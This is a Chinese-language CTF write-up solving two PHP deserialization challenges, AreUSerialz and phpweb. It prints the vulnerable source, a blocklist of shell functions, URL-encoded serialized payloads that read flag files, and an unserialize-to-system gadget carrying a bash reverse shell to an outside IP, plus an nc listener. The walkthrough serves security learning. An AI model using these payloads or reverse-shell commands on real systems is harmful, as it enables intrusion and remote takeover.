反序列化两道题目
难度不大,但也要认真审计
青龙组AreUSerialz
源码
<?php
include("flag.php");
highlight_file(__FILE__);
class FileHandler {
protected $op;
protected $filename;
protected $content;
function __construct() {
$op = "1";
$filename = "/tmp/tmpfile";
$content = "Hello World!";
$this->process();
}
public function process() {
if($this->op == "1") {
$this->write();
} else if($this->op == "2") {
$res = $this->read();
$this->output($res);
} else {
$this->output("Bad Hacker!");
}
}
private function write() {
if(isset($this->filename) && isset($this->content)) {
if(strlen((string)$this->content) > 100) {
$this->output("Too long!");
die();
}
$res = file_put_contents($this->filename, $this->content);
if($res) $this->output("Successful!");
else $this->output("Failed!");
} else {
$this->output("Failed!");
}
}
private function read() {
$res = "";
if(isset($this->filename)) {
$res = file_get_contents($this->filename);
}
return $res;
}
private function output($s) {
echo "[Result]: <br>";
echo $s;
}
function __destruct() {
if($this->op === "2")
$this->op = "1";
$this->content = "";
$this->process();
}
}
function is_valid($s) {
for($i = 0; $i < strlen($s); $i++)
if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
return false;
return true;
}
if(isset($_GET{'str'})) {
$str = (string)$_GET['str'];
if(is_valid($str)) {
$obj = unserialize($str);
}
}
绕过
过滤-1
function __destruct() {
if($this->op === "2")
$this->op = "1";
$this->content = "";
$this->process();
}
强弱比较差异(类型不同)进行绕过,
echo(2=='2' ? 1 :0); // 1
echo(2==='2' ? 1 :0); // 0
过滤-2
对is_valid
(即等效!( (chr($i) >= chr(32) && chr($i) <= chr(125)) )
逻辑)经测试,合法字符为,
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}
而protect变量自带%00
,不能通过检验,
改为public变量即可()
Payload
/flag
O%3A11%3A%22FileHandler%22%3A3%3A%7Bs%3A2%3A%22op%22%3BN%3Bs%3A8%3A%22filename%22%3BN%3Bs%3A7%3A%22content%22%3BN%3B%7D
flag.php
O%3A11%3A%22FileHandler%22%3A3%3A%7Bs%3A2%3A%22op%22%3Bi%3A2%3Bs%3A8%3A%22filename%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A7%3A%22content%22%3Bs%3A12%3A%22Hello+World%21%22%3B%7D
得到flag
朱雀组-phpweb
查看源码,存在表单,目测存在回调函数call_user_func
等,
<form id=form1 name=form1 action="index.php" method=post>
<input type=hidden id=func name=func value='date'>
<input type=hidden id=p name=p value='Y-m-d h:i:s a'>
</body>
</html>
</p>
<form id=form1 name=form1 action="index.php" method=post>
<input type=hidden id=func name=func value='date'>
<input type=hidden id=p name=p value='Y-m-d h:i:s a'>
</body>
</html>
POST
func=file_get_contents&p=index.php
index.php
<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
$result = call_user_func($func, $p);
$a= gettype($result);
if ($a == "string") {
return $result;
} else {return "";}
}
class Test {
var $p = "Y-m-d h:i:s a";
var $func = "date";
function __destruct() {
if ($this->func != "") {
echo gettime($this->func, $this->p);
}
}
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
// 防范大小写绕过
$func = strtolower($func);
if (!in_array($func,$disable_fun)) {
echo gettime($func, $p);
}else {
die("Hacker...");
}
}
?>
没有限制反序列化函数,可对TEST类利用,利用第二层的gettime
绕过对system
等的限制,
我使用了反弹bash,
需要现在服务器监听端口(确保端口在运营商和宝塔等处开放入规则),
nc -lvp [端口]
生成序列化,
class Test {
var $p = "bash -c 'bash -i >& /dev/tcp/121.36.96.230/2333 0>&1'";
var $func = "system";
}
echo urlencode(serialize(new Test()));
POST
func=unserialize&p=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A1%3A%22p%22%3Bs%3A53%3A%22bash+-c+%27bash+-i+%3E%26+%2Fdev%2Ftcp%2F121.36.96.230%2F2333+0%3E%261%27%22%3Bs%3A4%3A%22func%22%3Bs%3A6%3A%22system%22%3B%7D
翻不到,直接搜索
find / -name "fla*"
找到
/tmp/flagoefiu4r93
读取即可得到flag